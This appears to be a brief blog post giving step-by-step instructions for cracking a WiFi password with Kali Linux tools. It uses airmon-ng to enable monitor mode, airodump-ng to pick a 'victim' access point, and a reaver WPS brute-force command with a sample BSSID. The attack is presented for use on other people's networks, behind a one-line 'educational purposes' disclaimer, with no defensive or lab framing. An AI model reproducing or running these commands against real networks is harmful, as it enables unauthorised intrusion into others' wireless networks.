HOW TO HACK WIFI PASSWORD USING KALI LINUX

Dear Friends,

Today I’m gonna tell you. How to hack wifi

It's very easy do some step which i explained below.


Note:- “This video is only for educational purposes. My motive to provide basic information about that” 

Step:1- You should have kali 2.0 run kali 2.0

Step:2-  Open Terminal (CTRL + ALT + T)

Step:3-  Type the following commands on terminal.

airmon-ng check  (to check any process is running if yes then type next command)
airmon-ng check kill  (to kill all running process)

Step:4- Enable Monitor mode. Now, we use a tool called airmon-ng to create a virtual interface called mon. so type command
airmon-ng start wlan0   (to create a monitor mode like:-wlan0mon)
Step:5- Type another command 
airodump-ng wlan0mon  
after some time press  Ctrl+c
Step:6- Copy the BSSID of Victim. And write it on this command.
reaver -i wlan0mon -b (BSSID) -vv -K 1
For ex: reaver -i wlan0mon -c 1 -b AB:CG:76:12:C7:10 -vv -K 1
After some time you'll get password.
For more use Tech2Fun Youtube Channel 
Watch video and enjoy and subscribe....

Comments

Popular posts from this blog

How to Get Back Asus Zenphone 5 from Soft Brick

How to configure Glowroot with Liferay

Restore Database from .idb & .frm files in MySQL